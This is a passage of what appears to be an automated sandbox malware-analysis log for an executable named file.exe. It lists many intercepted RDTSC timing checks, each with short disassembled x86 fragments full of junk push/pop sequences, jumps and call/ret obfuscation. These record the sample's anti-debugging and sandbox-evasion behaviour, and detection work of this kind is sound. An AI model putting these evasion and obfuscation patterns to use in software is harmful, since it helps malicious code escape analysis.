                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB3A7 second address: 12FB3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC11F second address: 12FC125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB3AD second address: 12FB406 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FF8E8F8DBB8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c or dword ptr [ebp+12470E4Dh], ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 jmp 00007FF8E8F8DBBAh 0x0000003e mov eax, dword ptr [ebp+122D1425h] 0x00000044 push FFFFFFFFh 0x00000046 add dword ptr [ebp+122D2D15h], edx 0x0000004c nop 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB406 second address: 12FB40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC2B4 second address: 12FC2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF8E8F8DBBCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD414 second address: 12FD418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD418 second address: 12FD439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F8DBC9h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FD439 second address: 12FD43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE25C second address: 12FE313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FF8E8F8DBB8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov bx, ED96h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FF8E8F8DBB8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 pushad 0x00000053 mov ch, dh 0x00000055 popad 0x00000056 jmp 00007FF8E8F8DBC0h 0x0000005b mov dword ptr [ebp+122D5996h], eax 0x00000061 mov eax, dword ptr [ebp+122D0A8Dh] 0x00000067 mov edi, 10412EEEh 0x0000006c push FFFFFFFFh 0x0000006e clc 0x0000006f nop 0x00000070 jmp 00007FF8E8F8DBC5h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FF8E8F8DBBAh 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE313 second address: 12FE318 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FF213 second address: 12FF218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130048D second address: 1300492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13041FA second address: 1304204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302243 second address: 130229F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D3622h] 0x00000010 mov ebx, dword ptr [ebp+12459559h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jns 00007FF8E8F833BCh 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov ebx, dword ptr [ebp+122D35A6h] 0x00000030 mov eax, dword ptr [ebp+122D1419h] 0x00000036 mov bl, 42h 0x00000038 push FFFFFFFFh 0x0000003a jmp 00007FF8E8F833C6h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130229F second address: 13022A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13022A4 second address: 13022AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305314 second address: 130539C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov dword ptr [ebp+122D31BCh], eax 0x00000011 mov dword ptr [ebp+122D2AD9h], eax 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FF8E8F8DBB8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FF8E8F8DBB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 call 00007FF8E8F8DBC0h 0x00000055 mov dword ptr [ebp+122D254Ch], edx 0x0000005b pop edi 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 push edi 0x00000061 pop edi 0x00000062 jng 00007FF8E8F8DBB6h 0x00000068 popad 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130138B second address: 1301390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130821A second address: 130821E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130821E second address: 1308230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FF8E8F833B8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1308230 second address: 130823B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF8E8F8DBB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307393 second address: 1307399 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130823B second address: 1308292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FF8E8F8DBB8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 or ebx, dword ptr [ebp+122D2852h] 0x00000028 push 00000000h 0x0000002a mov ebx, 02C2918Dh 0x0000002f push 00000000h 0x00000031 jmp 00007FF8E8F8DBC7h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13083D2 second address: 13083FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8E8F833BCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13083FF second address: 130840D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130840D second address: 1308411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13084AC second address: 13084C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F8DBBBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13084C0 second address: 13084D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F833BBh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B191 second address: 130B197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B197 second address: 130B19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B19B second address: 130B1AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B1AA second address: 130B1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B1B3 second address: 130B1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D0E1 second address: 130D0F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D0F3 second address: 130D0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D0F7 second address: 130D0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D0FB second address: 130D115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jbe 00007FF8E8F8DBB6h 0x00000012 js 00007FF8E8F8DBB6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13108DF second address: 13108FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007FF8E8F833C5h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13108FB second address: 1310905 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF8E8F8DBD0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130FFC3 second address: 130FFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130FFC7 second address: 130FFE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC2h 0x00000007 jns 00007FF8E8F8DBB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310191 second address: 1310196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13104C0 second address: 13104C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13104C4 second address: 13104F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8E8F833C3h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8E8F833C1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13104F2 second address: 13104F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312E6B second address: 1312E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312E71 second address: 1312E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312E7A second address: 1312E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318098 second address: 131809F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13182F4 second address: 13182FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13182FA second address: 1318318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f jno 00007FF8E8F8DBB8h 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ecx 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131BAE0 second address: 131BAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131BAEA second address: 131BAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C0D6 second address: 131C0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C3C0 second address: 131C3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF8E8F8DBB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C3CA second address: 131C3E3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8E8F833B6h 0x00000008 jbe 00007FF8E8F833B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 js 00007FF8E8F833B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C6C2 second address: 131C6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C6CA second address: 131C6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FF8E8F833D2h 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FF8E8F833B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131C6DF second address: 131C6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131CC7D second address: 131CC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF8E8F833B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131CC89 second address: 131CC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF8E8F8DBBBh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F992 second address: 131F998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F998 second address: 131F9AC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF8E8F8DBB6h 0x00000008 jnp 00007FF8E8F8DBB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F9AC second address: 131F9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F9B0 second address: 131F9B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1323E75 second address: 1323E95 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F833C6h 0x00000008 jmp 00007FF8E8F833BAh 0x0000000d jc 00007FF8E8F833B6h 0x00000013 jbe 00007FF8E8F833BEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1322D09 second address: 1322D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1322D0F second address: 1322D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8E8F833BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1322D20 second address: 1322D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1322D24 second address: 1322D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3317 second address: 12F331B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F331B second address: 12F336E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 799E171Bh 0x0000000f lea eax, dword ptr [ebp+1248506Bh] 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF8E8F833B8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov di, bx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 jmp 00007FF8E8F833BAh 0x0000003b pop eax 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F336E second address: 12D16E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FF8E8F8DBB8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov edx, 0C1F72FEh 0x0000002b call dword ptr [ebp+122D2AF3h] 0x00000031 jc 00007FF8E8F8DBDAh 0x00000037 pushad 0x00000038 js 00007FF8E8F8DBB6h 0x0000003e jc 00007FF8E8F8DBB6h 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3545 second address: 12F354B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F354B second address: 12F354F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F354F second address: 12F3553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F383D second address: 12F3841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3916 second address: 12F391A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F391A second address: 12F393A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 255A6750h 0x0000000d sub dx, 0FD8h 0x00000012 call 00007FF8E8F8DBB9h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F393A second address: 12F393F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F393F second address: 12F3944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3944 second address: 12F395E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F395E second address: 12F3964 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3964 second address: 12F396A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F396A second address: 12F3992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a je 00007FF8E8F8DBBCh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007FF8E8F8DBBCh 0x00000022 jng 00007FF8E8F8DBB6h 0x00000028 rdtsc
